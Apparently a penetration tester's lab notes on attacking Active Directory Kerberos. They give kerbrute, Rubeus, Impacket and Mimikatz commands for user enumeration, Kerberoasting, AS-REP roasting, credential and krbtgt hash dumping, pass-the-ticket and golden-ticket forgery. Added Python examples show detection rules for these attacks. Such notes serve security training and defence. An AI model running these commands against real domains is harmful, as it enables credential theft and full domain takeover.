Kerberos

You can use Kerbrute to enumerate accounts without ever having to exploit a machine:

kerbrute userenum --dc [IP] -d CONTROLLER.local /home/kali/Documents/TryHackMe/Labs/Attacking_Kerberos/User.txt

Note: you will need to add an entry to your /etc/hosts file first.

Rubeus (local)

https://github.com/GhostPack/Rubeus

  • Rubeus.exe harvest /interval:30 - harvest tickets every 30 seconds
  • Rubeus.exe kerberoast - get hashes of kerberoastable accounts. Use BloodHound to see if they are worth anything.
  • Rubeus.exe asreproast
    • can be cracked with hashcat
    • YOU MAY NEED TO ADD 23$ TO THE HASH!! PAY ATTENTION TO THE FORMAT!!!

Impacket (remote)

impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip [IP] -request

Bash loop to run GetNPUsers over a user list (the grep drops the Impacket banner):

while read -r user; do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 "$domain/$user" | grep -v Impacket; done < users.txt

  • where $domain is just the short name, i.e. htb for htb.local
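Added example, not part of the original notes: detection logic for the three things the Kerbrute, Rubeus and Impacket sections above do (user enumeration, AS-REP roasting, Kerberoasting), run over constructed records shaped like Windows Security Event IDs 4768 and 4769. The field names are an assumption that mirrors the standard audit fields; a real SIEM will normalise them differently.

```python
"""Detections for the activity in the Kerbrute, Rubeus and Impacket notes:
user enumeration (kerbrute userenum), AS-REP roasting (Rubeus asreproast /
impacket-GetNPUsers) and Kerberoasting (Rubeus kerberoast / impacket-GetUserSPNs).

Added example, not part of the original notes. Runs over constructed records
shaped like Event IDs 4768 (TGT request) and 4769 (TGS request). The field
names are an assumption mirroring the standard audit fields.
"""
from collections import Counter

# etype 23 = RC4-HMAC. The roasting tools ask for it because hashcat can crack
# it; the "23" in hashcat's $krb5asrep$23$ / $krb5tgs$23$ prefix is this etype.
RC4_HMAC = "0x17"
# KDC_ERR_C_PRINCIPAL_UNKNOWN: the "no such user" reply kerbrute userenum keys on.
PRINCIPAL_UNKNOWN = "0x6"
NO_PREAUTH = "0"          # Pre-Authentication Type 0: no pre-auth was required
ENUM_THRESHOLD = 5        # unknown-user failures from one IP before we alert


def _failed_tgt(user, ip):
    """Constructed 4768 failure (unknown principal) as produced by userenum."""
    return {"id": 4768, "user": user, "ip": ip, "status": PRINCIPAL_UNKNOWN,
            "etype": RC4_HMAC, "preauth": NO_PREAUTH}


# Constructed sample events (not real logs). 10.10.14.5 is the attacker box.
EVENTS = [
    *[_failed_tgt(u, "10.10.14.5") for u in
      ("bob", "alice", "dave", "svc-sql", "backup", "helpdesk")],
    # normal AES logon with timestamp pre-auth (type 2)
    {"id": 4768, "user": "jdoe", "ip": "10.10.10.50", "status": "0x0",
     "etype": "0x12", "preauth": "2"},
    # AS-REP roast: successful TGT, RC4, no pre-auth required on the account
    {"id": 4768, "user": "svc-legacy", "ip": "10.10.14.5", "status": "0x0",
     "etype": RC4_HMAC, "preauth": NO_PREAUTH},
    # Kerberoast: RC4 service ticket for a user account's SPN
    {"id": 4769, "user": "jdoe", "ip": "10.10.14.5", "status": "0x0",
     "etype": RC4_HMAC, "service": "SQLService"},
    # ordinary AES service tickets: a machine account and the krbtgt ticket
    {"id": 4769, "user": "jdoe", "ip": "10.10.10.50", "status": "0x0",
     "etype": "0x12", "service": "MACHINE1$"},
    {"id": 4769, "user": "jdoe", "ip": "10.10.10.50", "status": "0x0",
     "etype": "0x12", "service": "krbtgt"},
]


def detect_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """kerbrute userenum: one client IP collecting many 'unknown principal'
    failures in 4768. Returns {ip: failure_count} for IPs at/over threshold."""
    counts = Counter(e["ip"] for e in events
                     if e["id"] == 4768 and e["status"] == PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def detect_asrep_roast(events):
    """Successful 4768 with Pre-Authentication Type 0 and RC4: the account has
    'Do not require Kerberos preauthentication' set and its AS-REP is crackable
    offline. Returns [(user, client_ip)]."""
    return [(e["user"], e["ip"]) for e in events
            if e["id"] == 4768 and e["status"] == "0x0"
            and e["preauth"] == NO_PREAUTH and e["etype"] == RC4_HMAC]


def detect_kerberoast(events):
    """4769 where an RC4 service ticket was issued for a user-owned SPN.
    krbtgt and machine accounts (trailing $) are excluded: their passwords are
    long and random, so they are not what a roaster is after."""
    return [(e["user"], e["service"], e["ip"]) for e in events
            if e["id"] == 4769 and e["etype"] == RC4_HMAC
            and e["service"] != "krbtgt" and not e["service"].endswith("$")]


if __name__ == "__main__":
    print("enumeration:", detect_user_enumeration(EVENTS))
    print("asrep roast:", detect_asrep_roast(EVENTS))
    print("kerberoast: ", detect_kerberoast(EVENTS))
```

The RC4 rule is the cheap one: once the domain stops issuing RC4 tickets (AES-only msDS-SupportedEncryptionTypes on service accounts), roasting output moves to etype 17/18 and the hashes get much slower to crack, so the same rule also measures how far that hardening has got. The enumeration threshold is per-IP with no time window; in practice you bucket by minute.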

Mimikatz

  • Can be used to dump creds, but it can also be used to grab Domain Admin tickets and impersonate them. Obviously great for privesc.
  • Steps:
    • mimikatz.exe
    • privilege::debug - if the output is not Privilege '20' OK, the rest won't work
    • sekurlsa::tickets /export - export the tickets on the machine
      • kerberos::ptt $ticket - pass the exported ticket to impersonate its owner. Recommend using an admin ticket…duh
    • lsadump::lsa /patch - if you are on a DC you can dump the hashes
    • lsadump::lsa /inject /name:krbtgt - on a DC, dump the krbtgt hash, which is what you need to create a golden ticket:
      • kerberos::golden /user: /domain: /sid: /krbtgt: /id:
      • you can then access any machine in the domain
        • misc::cmd
        • \\MACHINE1 cmd.exe
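Added example, not part of the original notes: a correlation rule for the two Mimikatz ticket tricks above, pass-the-ticket (kerberos::ptt with an exported ticket) and golden tickets (kerberos::golden). The idea: a legitimate service-ticket request (4769) is preceded, within the TGT lifetime, by a TGT request (4768) for the same account from the same client. A forged TGT never went through the KDC, so its 4769s have no matching 4768; a TGT exported on one host and replayed from another shows a client address that differs from the one that obtained it. The records are constructed, and the field names and the expected realm string are assumptions for this sample domain.

```python
"""Correlate 4769 (service ticket requested) with 4768 (TGT issued) to spot
forged or replayed TGTs. Added example, not part of the original notes;
events are constructed and field names are an assumption.
"""
from collections import defaultdict
from datetime import datetime, timedelta

TGT_MAX_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for user ticket"
# Assumed: how this DC renders the Account Domain field in a legitimate 4769.
EXPECTED_REALM = "CONTROLLER.LOCAL"

# Constructed sample events (not real logs). 10.10.14.5 is the attacker box.
EVENTS = [
    {"id": 4768, "time": "2024-01-15T08:00:00", "user": "jdoe",
     "domain": EXPECTED_REALM, "ip": "10.10.10.50"},
    # normal: jdoe's TGT used from the same workstation seconds later
    {"id": 4769, "time": "2024-01-15T08:00:05", "user": "jdoe",
     "domain": EXPECTED_REALM, "ip": "10.10.10.50", "service": "MACHINE1$"},
    # pass-the-ticket: jdoe's exported TGT replayed from another host
    {"id": 4769, "time": "2024-01-15T09:30:00", "user": "jdoe",
     "domain": EXPECTED_REALM, "ip": "10.10.14.5", "service": "DC01$"},
    # golden ticket: service ticket for Administrator with no TGT request on
    # record; realm rendered in lowercase, as typed into the forging tool
    # (a heuristic indicator, assumed here, not a guarantee)
    {"id": 4769, "time": "2024-01-15T10:00:00", "user": "Administrator",
     "domain": "controller.local", "ip": "10.10.14.5", "service": "DC01$"},
]


def correlate_tgs_requests(events, max_lifetime=TGT_MAX_LIFETIME,
                           expected_realm=EXPECTED_REALM):
    """Walk events in time order, remember TGT issuances per account, and test
    each 4769 against them. Returns [(user, client_ip, (reason, ...))]."""
    tgts = defaultdict(list)           # account -> [(issue_time, client_ip)]
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        account = e["user"].lower()
        if e["id"] == 4768:
            tgts[account].append((when, e["ip"]))
            continue
        if e["id"] != 4769:
            continue
        reasons = []
        if e["domain"] != expected_realm:
            reasons.append("realm-format-mismatch")
        # TGTs for this account that are still within their lifetime
        live = [(t, ip) for t, ip in tgts[account]
                if timedelta(0) <= when - t <= max_lifetime]
        if not live:
            reasons.append("tgs-without-tgt")
        elif e["ip"] not in {ip for _, ip in live}:
            reasons.append("tgt-client-mismatch")
        if reasons:
            findings.append((e["user"], e["ip"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for finding in correlate_tgs_requests(EVENTS):
        print(finding)
```

Two caveats before running this against a real domain: the 4768 and the 4769 for one session can land on different domain controllers, so aggregate every DC's Security log first or tgs-without-tgt fires on perfectly normal traffic; and TGT renewals also log 4768, which is why the rule re-reads the list rather than keeping only the first issuance. The realm check only holds once you have confirmed how your DCs render the field for normal users.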